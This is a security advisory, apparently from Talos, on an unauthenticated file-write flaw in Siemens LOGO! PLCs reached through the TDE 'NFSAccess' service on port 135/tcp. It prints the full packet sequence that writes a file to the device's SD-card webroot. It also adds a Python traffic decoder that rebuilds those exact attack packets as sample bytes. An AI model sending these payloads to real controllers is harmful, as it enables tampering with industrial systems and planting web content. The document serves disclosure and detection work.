Talos Intelligence: TALOS-2020-1026
Published: Jun 09, 2020

Siemens LOGO! TDE service "NFSAccess" Upload File Write Vulnerability

Source: Talos Intelligence (www.talosintelligence.com)

CVSS2: 6.4 - AV:N/AC:L/Au:N/C:P/I:P/A:N
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: NONE

CVSS3: 9.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: NONE

EPSS: 0.001 (Percentile: 48.3%)

Summary

An exploitable file write vulnerability exists in the TDE service functionality of Siemens LOGO! 1.82.02, 12/24RCE Version 0BA and 230RCE Version 0BA. A specially crafted network request can upload or overwrite file content to the local SD card. An attacker can send a sequence of malicious packets to trigger this vulnerability.

Tested Versions

Siemens LOGO! 1.82.02
Siemens LOGO! 12/24RCE Version 0BA
Siemens LOGO! 230RCE Version 0BA

Product URLs

https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-306 - Missing Authentication for Critical Function

Details

Siemens LOGO! is an intelligent logic module (PLC) meant for automation projects such as industrial control systems, office/commercial and home settings. It is deployed worldwide and can be controlled remotely.

Files can be uploaded or overwritten on the SD card through the LOGO TDE Service port 135/TCP using the "NFSAccess" upload function. The security vulnerability could be exploited by an unauthenticated attacker with network access to port 135/tcp. No user interaction is required to exploit this security vulnerability. The vulnerability impacts the integrity and availability of the device, since a copy-protected program can be overwritten during this process. The payload used to upload a file (/dev/sdcard/webroot/js/ctalos.js) was:

Structure of the payload messages sent:

\x4B\x90\x05\xc0 # Start of message: Signature, Version, ClientVersion, Sync Flag, Return Flag, Request Flag.
\x02\x00\x00\x00 # Context
\x01\x00\x00\x00 # Session
\x4e\x46\x53\x41 # NFSAccess command
\x63\x63\x65\x73
\x73\x00\x00\x00
\x00\x00\x00\x00
\x02\x00\x00\x00 # Probably Open function
\xff\xff\xff\xff
\xff\xff\xff\xff # Probably File handle
\xff\xff\xff\xff
\x00\x00\xc0\x0c
\x21\x00\x00\x00 # Probably Data size
\x00\x00\x00\x00
\x2f\x64\x65\x76 # /dev/sdcard/webroot/js/ctalos.js # SD card path
\x2f\x73\x64\x63
\x61\x72\x64\x2f
\x77\x65\x62\x72
\x6f\x6f\x74\x2f
\x6a\x73\x2f\x63
\x74\x61\x6c\x6f
\x73\x2e\x6a\x73
\x00

\x4b\x90\x04\xc0 # Start of message: Signature, Version, ClientVersion, Sync Flag, Return Flag, Request Flag.
\x03\x00\x00\x00 # Context
\x01\x00\x00\x00 # Session
\x4e\x46\x53\x41 # NFSAccess command
\x63\x63\x65\x73
\x73\x00\x00\x00
\x00\x00\x00\x00
\x06\x00\x00\x00 # Probably Transfer function
\xff\xff\xff\xff
\x54\x15\x45\x55 # Probably File handle
\xff\xff\xff\xff
\x00\x00\x00\x00
\x11\x00\x00\x00 # Probably Data size
\x00\x00\x00\x00
\x2f\x2f\x20\x54 # Data to upload into SD card
\x68\x69\x73\x20
\x69\x73\x20\x61
\x20\x74\x65\x73
\x74

\x4b\x80\x03\xc0 # Start of message: Signature, Version, ClientVersion, Sync Flag, Return Flag, Request Flag.
\x04\x00\x00\x00 # Context
\x01\x00\x00\x00 # Session
\x4e\x46\x53\x41 # NFSAccess command
\x63\x63\x65\x73
\x73\x00\x00\x00
\x00\x00\x00\x00
\x03\x00\x00\x00 # Probably Closing function
\xff\xff\xff\xff
\x54\x15\x45\x55 # Probably file handle
\xff\xff\xff\xff
\x00\x00\x00\x00
\x00\x00\x00\x00
\x00\x00\x00\x00

We were able to identify this vulnerability on firmware 1.82.02 (released on May 13, 2019).
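
The message layout annotated in the dumps above, turned into a small passive decoder that a defender could run over traffic captured on port 135/tcp. This is an added example written for this page, not Talos's or Siemens' code. The field offsets (command name at byte 12, function code at 28, file handle at 36, data size at 48, data at 56) and the meaning of function codes 2, 6 and 3 are assumptions taken from the advisory's own "Probably ..." annotations, and the names parse_tde_message, describe_nfsaccess and scan_stream are chosen here. The three dumped requests are re-assembled as constructed sample input so the decoder runs offline.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional

# Offsets below are ASSUMPTIONS inferred from the annotations in TALOS-2020-1026,
# not a vendor-published specification of the LOGO! TDE message format.
HEADER_LEN = 56                 # fixed-size part preceding the variable data
CMD_OFFSET, CMD_LEN = 12, 16    # ASCII command name, NUL padded ("NFSAccess")
FUNC_OFFSET = 28                # "Probably Open/Transfer/Closing function"
HANDLE_OFFSET = 36              # "Probably File handle"
SIZE_OFFSET = 48                # "Probably Data size"
DATA_OFFSET = 56

# Function codes as tentatively labelled in the advisory (assumption).
FUNC_NAMES = {2: "open", 6: "transfer", 3: "close"}


@dataclass
class TdeMessage:
    header: bytes      # first 4 bytes (signature/version/flags, left undecoded)
    context: int
    session: int
    command: str
    function: int
    handle: bytes
    data_size: int
    data: bytes


def parse_tde_message(buf: bytes) -> TdeMessage:
    """Decode one TDE request; raise ValueError if the buffer is truncated."""
    if len(buf) < HEADER_LEN:
        raise ValueError(f"buffer too short for TDE header: {len(buf)} bytes")
    context, session = struct.unpack_from("<II", buf, 4)
    raw_cmd = buf[CMD_OFFSET:CMD_OFFSET + CMD_LEN].split(b"\x00", 1)[0]
    command = raw_cmd.decode("ascii", "replace")
    (function,) = struct.unpack_from("<I", buf, FUNC_OFFSET)
    handle = buf[HANDLE_OFFSET:HANDLE_OFFSET + 4]
    (data_size,) = struct.unpack_from("<I", buf, SIZE_OFFSET)
    data = buf[DATA_OFFSET:DATA_OFFSET + data_size]
    if len(data) != data_size:
        raise ValueError(f"declared data size {data_size} exceeds {len(data)} available bytes")
    return TdeMessage(buf[:4], context, session, command, function, handle, data_size, data)


def describe_nfsaccess(msg: TdeMessage) -> Optional[str]:
    """Return a finding for NFSAccess file-write activity, or None for other commands.

    Per the advisory, any unauthenticated NFSAccess open/transfer on port 135/tcp
    is an SD-card write attempt, so each step is reported for monitoring.
    """
    if msg.command != "NFSAccess":
        return None
    name = FUNC_NAMES.get(msg.function, f"unknown({msg.function})")
    if name == "open":
        path = msg.data.split(b"\x00", 1)[0].decode("ascii", "replace")
        return f"NFSAccess open of SD-card path {path!r}"
    if name == "transfer":
        return f"NFSAccess transfer of {msg.data_size} bytes to handle {msg.handle.hex()}"
    if name == "close":
        return f"NFSAccess close of handle {msg.handle.hex()}"
    return f"NFSAccess {name}"


def scan_stream(messages: List[bytes]) -> List[str]:
    """Parse captured TDE requests in order and collect NFSAccess findings."""
    findings = []
    for raw in messages:
        desc = describe_nfsaccess(parse_tde_message(raw))
        if desc:
            findings.append(desc)
    return findings


# Constructed sample input: the three requests dumped in the advisory, re-assembled.
CMD = b"NFSAccess" + b"\x00" * 7
NO_HANDLE = b"\xff" * 4
HANDLE = bytes.fromhex("54154555")
PATH = b"/dev/sdcard/webroot/js/ctalos.js\x00"
BODY = b"// This is a test"

OPEN_MSG = (b"\x4b\x90\x05\xc0" + struct.pack("<II", 2, 1) + CMD
            + struct.pack("<I", 2) + NO_HANDLE + NO_HANDLE + NO_HANDLE
            + b"\x00\x00\xc0\x0c" + struct.pack("<II", len(PATH), 0) + PATH)
TRANSFER_MSG = (b"\x4b\x90\x04\xc0" + struct.pack("<II", 3, 1) + CMD
                + struct.pack("<I", 6) + NO_HANDLE + HANDLE + NO_HANDLE
                + b"\x00" * 4 + struct.pack("<II", len(BODY), 0) + BODY)
CLOSE_MSG = (b"\x4b\x80\x03\xc0" + struct.pack("<II", 4, 1) + CMD
             + struct.pack("<I", 3) + NO_HANDLE + HANDLE + NO_HANDLE
             + b"\x00" * 12)

if __name__ == "__main__":
    for finding in scan_stream([OPEN_MSG, TRANSFER_MSG, CLOSE_MSG]):
        print(finding)
```

The decoder deliberately treats the declared data size as untrusted and refuses a message whose payload is shorter than advertised, which is the first check any monitoring parser for this port should make. Because the function-code meanings are guesses from the advisory, an unknown code is still reported rather than dropped, so a sensor built on this does not go blind on variants the advisory did not exercise.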

Timeline

2020-03-20 - Vendor Disclosure
2020-06-09 - Public Release

